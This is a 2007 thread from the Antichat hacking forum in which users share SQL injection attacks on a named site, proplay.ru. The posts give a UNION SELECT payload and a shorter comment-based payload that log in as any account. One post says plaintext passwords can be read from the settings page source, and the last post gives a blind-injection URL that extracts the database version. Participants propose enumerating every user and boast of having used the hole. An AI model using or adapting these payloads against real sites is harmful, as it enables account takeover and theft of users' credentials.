Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Уязвимость на proplay.ru (https://forum.antichat.xyz/showthread.php?t=41560)

Joker-jar 04.06.2007 16:13

Уязвимость на proplay.ru
 
Посодействовал l1ght, за что ему большое спасибо. Суть баги в том, что можно залогиниться под любым аккаунтом следующим способом:

Логин: -1
Пароль: ' union select id,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll/*

Где id - id юзера. :)

ice1k 04.06.2007 16:37

Как уже сказал гема хватает просто:
user'/*
asd

И ещё, если хотите узнать пароль - зайдите в /users/settings/ там будет пароль за звёздочками, открывайте сорцы страницы - там будет пароль в чистом виде...

Joker-jar 04.06.2007 16:52

Первый метод подойдет, скажем, для создания БД всех юзеров (путем перебора id).

loc 05.06.2007 17:25

Эх.... жаль перекрыли уже :)) Но я успел поюзать .... Респект авторам!!! :cool:

BlasT 07.06.2007 15:24

http://www.proplay.ru/forums/cs/7909'/
есть еще одна sql токо не как немогу подобрать правильное кол-во полей кто поможет?

Joker-jar 09.06.2007 11:45

:) Как подбираешь? Это не скуля, а просто бажок в скрипте, в частности, в инклудинге. Ничего там не поимеешь

З.Ы. Хотя сорри, затупил. Теперь вижу...

Joker-jar 09.06.2007 12:03

На счет union точно не знаю. Посимвольный перебор:
Код:

http://www.proplay.ru/forums/q3'+and+ascii(lower(substring(version(),1,1)))=0x35+and+'1'='1/
MySQL 5.x


Время: 13:51